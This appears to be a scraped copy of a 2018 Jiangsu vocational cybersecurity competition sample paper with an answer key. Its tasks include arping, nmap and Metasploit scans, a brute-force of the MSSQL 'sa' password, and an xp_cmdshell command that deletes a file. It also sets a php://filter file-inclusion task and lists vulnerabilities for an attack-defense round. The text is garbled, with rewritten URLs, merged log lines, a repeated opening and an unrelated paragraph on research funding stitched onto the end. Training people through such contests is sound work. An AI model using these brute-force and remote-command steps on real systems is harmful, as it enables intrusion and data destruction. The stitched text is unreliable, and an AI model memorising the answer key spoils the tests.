(新)江苏省2018年度中职组网络空间安全赛项样题及答案

(新)江苏省2018年度中职组网络空间安全赛项样题及答案
(新)江苏省2018年度中职组网络空间安全赛项样题及答案

2018年度全国职业技能大赛中职组“网络空间安全”赛项

江苏省竞赛任务书

(样题)

一、竞赛时间

9:00-12:00,共计3小时。

二、竞赛阶段简介

三、竞赛任务书内容

(一)拓扑图

(二)第一阶段任务书

任务1.ARP扫描渗透测试

任务环境说明:

?服务器场景:CentOS5.5

?服务器场景操作系统:CentOS5.5

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试(使用工具arping,发送请求数据包数量为5个),并将该操作使用

命令中固定不变的字符串作为Flag提交;

Arping –c 5 x.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试(使用工具arping,发送请求数据包数量为5个),并将该操作结果

的最后1行,从左边数第2个数字作为Flag提交;

Arping –c 5 x.x.x.x

root@kali:~# arping -c 5 192.168.28.122

ARPING 192.168.28.122 from 192.168.28.100 eth0

Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.017ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 0.638ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.590ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Sent 5 probes (1 broadcast(s))

Received 5 response(s)

Flag:5

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交;

msf > use auxiliary/scanner/discovery/arp_sweep

Flag:Auxiliary/scanner/discovery/arp_sweep

4.通过PC2中渗透测试平台对服务器场景CentOS

5.5进行ARP扫描渗透测

试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交;

msf > use auxiliary/scanner/discovery/arp_sweep

msf auxiliary(arp_sweep) > run

[*] 192.168.28.122 appears to be up (VMware, Inc.).

[*] 192.168.28.2 appears to be up (VMware, Inc.).

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag:completed

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;

msf auxiliary(arp_sweep) > run

[*] 192.168.28.122 appears to be up (VMware, Inc.).

[*] 192.168.28.2 appears to be up (VMware, Inc.).

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag:appears

6.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测

试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;

Flag:exploit or run

任务2.操作系统及应用程序扫描渗透测试

任务环境说明:

?服务器场景:CentOS5.5

?服务器场景操作系统:CentOS5.5

1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测

试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

Flag:Nmap –n –Sp x.x.x.x

2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测

试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;

root@kali:~# nmap -n -sP 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 19:59 EST Nmap scan report for 192.168.28.122

Host is up (0.00069s latency).

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

Flag:up

3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透

测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

root@kali:~# nmap -n -A 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122

Host is up (0.00025s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

| ssh-hostkey:

| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)

|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 910/udp status

|_ 100024 1 913/tcp status

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.25 ms 192.168.28.122

OS and Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

Flag:Nmap –n –A x.x.x.x

4.通过PC2中渗透测试平台对服务器场景CentOS

5.5进行综合性扫描渗透

测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;

root@kali:~# nmap -n -A 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:11 EST Nmap scan report for 192.168.28.122

Host is up (0.00025s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

| ssh-hostkey:

| 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA) |_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA) 111/tcp open rpcbind 2 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2 111/tcp rpcbind

| 100000 2 111/udp rpcbind

| 100024 1 910/udp status

|_ 100024 1 913/tcp status

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.25 ms 192.168.28.122

OS and Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

Flag:seconds

5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗

透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

root@kali:~# nmap -O 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:13 EST Nmap scan report for 192.168.28.122

Host is up (0.00044s latency).

Not shown: 998 closed ports

PORT STATE SERVICE

22/tcp open ssh

111/tcp open rpcbind

MAC Address: 00:0C:29:62:80:73 (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.30

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds Flag:Nmap –O x.x.x.x

6.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及

版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;

Flag:Nmap –sV x.x.x.x

7.通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及

版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;

root@kali:~# nmap -sV 192.168.28.122

Starting Nmap 7.40 ( https://https://www.360docs.net/doc/1911593262.html, ) at 2017-12-10 20:17 EST Nmap scan report for 192.168.28.122

Host is up (0.00014s latency).

Not shown: 998 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

111/tcp open rpcbind 2 (RPC #100000)

MAC Address: 00:0C:29:62:80:73 (VMware)

Service detection performed. Please report any incorrect results at https://https://www.360docs.net/doc/1911593262.html,/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 19.60 seconds

Flag:OpenSSH 4.3

任务3.Web应用程序文件包含安全攻防

任务环境说明:

?服务器场景名称:WebServ2003

?服务器场景安全操作系统:Microsoft Windows2003 Server

?服务器场景安装中间件:Apache2.2;

?服务器场景安装Web开发环境:Php6;

?服务器场景安装数据库:Microsoft SqlServer2000;

?服务器场景安装文本编辑器:EditPlus;

1.访问WebServ2003服务器场景,"/"->"Display Uploaded's File

Content",分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;

2.对该任务题目1页面注入点进行渗透测试,通过php://filter协议使当

前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;

3.对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方

式回显内容作为Flag提交;

4.通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容

作为Flag提交;

5.进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,

使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);

6.再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点

对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;

任务4.数据库安全加固

任务环境说明:

?服务器场景名称:WebServ2003

?服务器场景安全操作系统:Microsoft Windows2003 Server

?服务器场景安装中间件:Apache2.2;

?服务器场景安装Web开发环境:Php6;

?服务器场景安装数据库:Microsoft SqlServer2000;

?服务器场景安装文本编辑器:EditPlus;

1.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft

SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Flag提交;

2.对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft

SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstat–an命令,将回显的数据库服务连接状态作为Flag提交;

C:\Documents and Settings\Administrator>netstat -an

Active Connections

Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING TCP 192.168.28.131:139 0.0.0.0:0 LISTENING UDP 0.0.0.0:445 *:*

UDP 0.0.0.0:500 *:*

UDP 0.0.0.0:1434 *:*

UDP 0.0.0.0:4500 *:*

UDP 127.0.0.1:123 *:*

UDP 192.168.28.131:123 *:*

UDP 192.168.28.131:137 *:*

UDP 192.168.28.131:138 *:*

Flag:LISTENING

3.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务

扫描渗透测试,并将扫描结果作为Flag提交;

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > run

[*] 192.168.28.131: - SQL Server information for

192.168.28.131:

[+] 192.168.28.131: - ServerName = SERVER

[+] 192.168.28.131: - InstanceName = MSSQLSERVER

[+] 192.168.28.131: - IsClustered = No

[+] 192.168.28.131: - Version = 8.00.194

[+] 192.168.28.131: - tcp = 1433

[+] 192.168.28.131: - np =

\\SERVER\pipe\sql\query

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

4.通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务

超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件

superdic.txt),并将破解结果中的最后一个字符串作为Flag提交;

msf > use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set username sa

msf auxiliary(mssql_login) > set pass_file

/usr/share/wordlists/metasploit/password.lst

msf auxiliary(mssql_login) > run

[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.

[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )

WORKSTATION\sa:!@#$%^& (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )

WORKSTATION\sa:10 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1022 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10sne1 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:111111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:11111111 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:112233 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1212 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:121212 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1213 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1214 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1225 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123123 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:123321 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1234 (Incorrect: )

WORKSTATION\sa:12345 (Incorrect: )

[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\sa:123456

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Flag: completed

5.通过PC2中de1渗透测试平台对服务器场景WebServ2003进行数据库服

务扩展存储过程进行利用,删除WebServ2003服务器场景C:\1.txt,并

将渗透测试利用命令以及渗透测试平台run结果第1行回显作为Flag

提交;

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) > set rhost 192.168.28.131

msf auxiliary(mssql_exec) > set password 123456

msf auxiliary(mssql_exec) > set cmd cmd.exe /c del "C:\\1.txt"

msf auxiliary(mssql_exec) > run

[*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell

'cmd.exe /c del C:\1.txt'

output

------

[*] Auxiliary module execution completed

Flag: [*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\1.txt'

6.通过对服务器场景WebServ2003的数据库服务进行安全加固,阻止PC2

中渗透测试平台对其进行数据库超级管理员密码暴力破解渗透测试,并

将加固身份验证选项中的最后一个字符串作为Flag提交:

W

7.验证在WebServ2003的数据库服务进行安全加固后,再次通过PC2中渗

透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令

进行暴力破解(使用PC2中的渗透测试平台中的字典文件

superdic.txt),并将破解结果的从上向下数第3行内容作为Flag提交;

msf auxiliary(mssql_login) > run

[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.

[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$% (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^ (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^& (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!@#$%^&* (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerbul (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!boerseun (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!gatvol (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!hotnot (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!kak (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!koedoe (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!likable (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!poes (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!pomp (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:!soutpiel (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:.net (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:00000000 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:007007 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0s (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:0th (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:10 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:100 (Incorrect: )

[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\sa:1000 (Incorrect: )

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

(三)第二阶段任务书

假定各位选手是某企业信息安全工程师,负责服务器的维护,其中某服务器可能存在着各种问题和漏洞(见以下漏洞列表)。你需要尽快对这台服务器进行加固,需要对其它参赛队的系统进行渗透测试,取得FLAG值并提交到裁判服务器。

提示:

1、本阶段需按赛场IP参数表,自行配置IP地址信息;

2、服务器中的漏洞可能是常规漏洞也可能是系统漏洞;需要加固常规漏洞;并对其它参赛队系统进行渗透测试,取得FLAG值并提交到裁判服务器。

十五分钟之后,各位选手将真正进入分组对抗环节。

注意事项:

注意1:比赛现场存在针对每台靶机的端口扫描机制,任何时候不能人为关闭服务器的TCP端口号21、22、23、80,否则将判令停止比赛,第二阶段分数为0分;

注意2:不能对裁判服务器进行攻击,否则将判令停止比赛,第二阶段分数为0分;

注意3:FLAG值为每台受保护服务器的唯一性标识,每台受保护服务器仅

有一个。靶机的Flag值存放在./root/flaginfo*文件内容当中;每提交1次对手靶机的Flag值自动得分;每当被对手提交1次自身靶机的Flag值自动扣分;每个对手靶机的Flag值只能被自己提交一次;

注意4:在渗透测试环节里,各位选手需要继续保护你的服务器免受各类黑客的攻击,你可以继续加固你的服务器,你也可以选择攻击其他组的保护服务器。

漏洞列表如下:

1. 靶机上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限。

2. 靶机上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限

3. 靶机上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权

4. 操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限。

5. 操作系统提供的服务可能包含了缓冲区溢出漏洞,要求用户找到缓冲区溢出漏洞的服务,并利用此漏洞获取系统权限。

6. 操作系统中可能存在一些系统后门,选手可以找到此后门,并利用预留的后门直接获取到系统权限。

选手通过以上的所有漏洞点,最后得到其他选手靶机的最高权限,并获取到其他选手靶机上的FLAG值进行提交。

(新)江苏省2018年度中职组网络空间安全赛项样题及答案

2018年度全国职业技能大赛中职组“网络空间安全”赛项 江苏省竞赛任务书 (样题) 一、竞赛时间 9:00-12:00,共计3小时。 二、竞赛阶段简介

三、竞赛任务书内容 (一)拓扑图 (二)第一阶段任务书 任务1.ARP扫描渗透测试 任务环境说明: ?服务器场景:CentOS5.5 ?服务器场景操作系统:CentOS5.5 1.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测 试(使用工具arping,发送请求数据包数量为5个),并将该操作使用 命令中固定不变的字符串作为Flag提交; Arping –c 5 x.x.x.x 2.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测 试(使用工具arping,发送请求数据包数量为5个),并将该操作结果 的最后1行,从左边数第2个数字作为Flag提交; Arping –c 5 x.x.x.x

root@kali:~# arping -c 5 192.168.28.122 ARPING 192.168.28.122 from 192.168.28.100 eth0 Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.017ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 0.638ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.590ms Unicast reply from 192.168.28.122 [00:0C:29:62:80:73] 1.051ms Sent 5 probes (1 broadcast(s)) Received 5 response(s) Flag:5 3.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测 试(使用工具Metasploit中arp_sweep模块),并将工具Metasploit 中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/…/字符串n)提交; msf > use auxiliary/scanner/discovery/arp_sweep Flag:Auxiliary/scanner/discovery/arp_sweep 4.通过PC2中渗透测试平台对服务器场景CentOS 5.5进行ARP扫描渗透测 试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提交; msf > use auxiliary/scanner/discovery/arp_sweep msf auxiliary(arp_sweep) > run [*] 192.168.28.122 appears to be up (VMware, Inc.). [*] 192.168.28.2 appears to be up (VMware, Inc.). [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Flag:completed 5.通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测 试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交; msf auxiliary(arp_sweep) > run [*] 192.168.28.122 appears to be up (VMware, Inc.). [*] 192.168.28.2 appears to be up (VMware, Inc.). [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

国家网络空间安全技术研究方向

网络与系统安全防护技术研究方向 1.1网络与系统安全体系架构研究(基础前沿类) 研究内容:针对网络大规模更新换代所面临的安全可信和管理问题,面向开放和互通的国家网络管理,研究网络和系统安全体系结构,重点研究以IPv6网络层的真实可信为基础的网络安全管理体系结构、关键机制和关键应用。针对未来多层次、动态、异构、差异度巨大的无线接入环境,研究新型无线网络安全接入管理机制。针对国际上新型网络与系统体系结构的发展,如软件定义网络和系统、网络功能虚拟化、命名数据网络和系统等,对其安全问题和安全机制进行前沿探索研究。 考核指标:提出IPv6网络安全管理体系结构中的信任锚点、真实可信的网络定位符和标识符机制,并制定国际标准;基于上述安全可信基础,提出兼顾国际开放互通与国家安全管理的IPv6网络安全体系结构,通过安全威胁模型检验该体系结构的安全性。提出IPv6安全管理体系结构下的关键机制,至少包括:兼顾用户隐私性、可验证性和可还原性的可信标识符认证、管理、追溯与审计机制,分级管理机制,网络监控和灵活路由机制等。完成一套IPv6安全管理体系结构、关键机制和关键应用的软硬件原型系统。基于国际学术网络合作、国内主干网、园区网(校园网或企业网),对上述原理机制和原型系统进行跨国、自治系统间、自治系统内、接入子网等多层次网络的试验验证。提出新型无线网络安全接入管理机制,研究适用在多维、异构的无线有线一体化融合网络中的信任锚点、真实可信的网络定位符和标识符机制,实现上述一体化融合网络的网络层真实可信;支持软件定义无线电,支持最新IEEE 802.11ac或802.11ax等新型无线接入技术;支持移动终端在至少2种无线网络间的安全接入选择、可信透明移动。提出SDN/NFV等新型组网技术和NDN等未来互联网体系下的安全可信问题的解决方案,提出并解决能够支持SDN/NFV和未来网络体系结构的可编程网络基础设施的安全问题,提出相关计算系统中的安全可信问题解决方法。完成安全体系结构相关国际标准3项以上,并获国际标准组织(IETF、ITU、IEEE等)立项或批准;申请国家发明专利15项以上。原理机制和原型系统需通过一定规模的真实网络试验验证,至少包括10个关键应用、10万IPv6用户。 